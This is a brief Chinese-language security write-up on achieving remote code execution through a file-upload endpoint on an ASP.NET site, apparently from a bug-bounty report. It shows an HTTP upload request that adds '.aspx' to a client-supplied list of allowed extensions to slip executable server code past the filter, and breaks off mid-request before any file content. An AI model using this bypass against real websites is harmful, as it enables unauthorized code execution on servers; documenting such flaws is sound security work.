【网络安全】ASP.NET网站中的文件上传RCE
未经许可,不得转载。
文章目录
-
- 正文
正文
目标:subdomain.REDACTED.vn
有一个端点允许将文档上传到服务器,由于这个门户网站使用了ASP.NET框架,我尝试上传了一个随机的aspx文件。
请求包如下:
POST /api/Upload?dirName=<value>&typeData=files&acceptExtensions=[%22.pdf%22,%22.png%22,%22.jpeg%22,%22.jpg%22,%22.doc%22,%22.docx%22,%22.xls%22,%22.xlsx%22,%22.gif%22,%22.aspx%22] HTTP/2
Host: subdomain.REDACTED.vn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer Token
Content-Type: multipart/form-data; boundary=------------------------